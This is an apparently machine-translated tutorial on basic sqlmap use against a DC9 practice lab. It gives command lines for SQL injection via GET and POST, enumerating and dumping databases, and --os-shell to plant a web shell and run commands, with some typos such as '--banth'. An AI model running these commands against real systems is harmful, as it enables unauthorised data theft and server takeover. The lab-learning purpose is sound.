Basic usage of sqlmap

This article only introduces sqlmap Simple use method , Refer to official documentation

https://github.com/sqlmapproject/sqlmap/wiki/Usage

csdn The master

https://blog.csdn.net/Breeze_CAT/article/details/80628392

Personal advice , See the specific parameters directly csdn Master's , This article takes DC9 Take the shooting range as the target to practice , Use sqlmap Get target data or permissions

GET type

sqlmap -u http://192.168.43.143/ceshi.php?id=1 --banth --level 4 

-u Enter your destination address
--batch Automatically enter the attribute value of the option
--level Set the test level （1-5, The default is 1）lv2：cookie Inject ; lv3：user-agent Inject ,lv4:refere Inject ; lv5：host Inject
POST type
You can get the request package of the corresponding address , Use bp Just grab and save

sqlmap -u ceshi.txt --batch --level 4

perhaps

sqlmap -u http://192.168.43.143/results.php   --method=POST --data="search=1" --level 4 --batch

--method Select the method of parameter transmission
--data Select the passed in parameters

sqlmap -u http://192.168.43.143/results.php   --method=POST --data="search=1" --level 4 --batch --random-agent

--random-agent Use random UA head
sqlmap -r ceshi.txt --batch --current-db View the current database
--current-db View the current database
Query database content
View the name of the owned database

sqlmap -r ceshi.txt --batch --dbs --level 4

Select database , The query table name

sqlmap -r cesh.txt --batch -D shujuku --tables

Query the column names in the table

sqlmap -r ceshi.txt --batch -D shjuku -T biao --columns

View the contents of some columns in the table

sqlmap -r ceshi.txt --batch -D shujuku -T biao -C id,username --dump

--dump Download means , The preceding parameters are the content to be downloaded

sqlmap -r ceshi.txt --batch --dump-all

--dump-all Means Download all , That is, take off your pants
view the database , Correspondence of table contents

sqlmap -r ceshi.txt --schema 

--schema Target database database system management mode , Similar to a topological graph
Write Trojan , Carry out orders

sqlmap -r ceshi.txt --os-shell 

sqlmap Will automatically find the path to write shell
fingerprint identification

sqlmap -r ceshi.txt -f --dbs 

When the target has injection , Use -f Parameter to get the target operating system information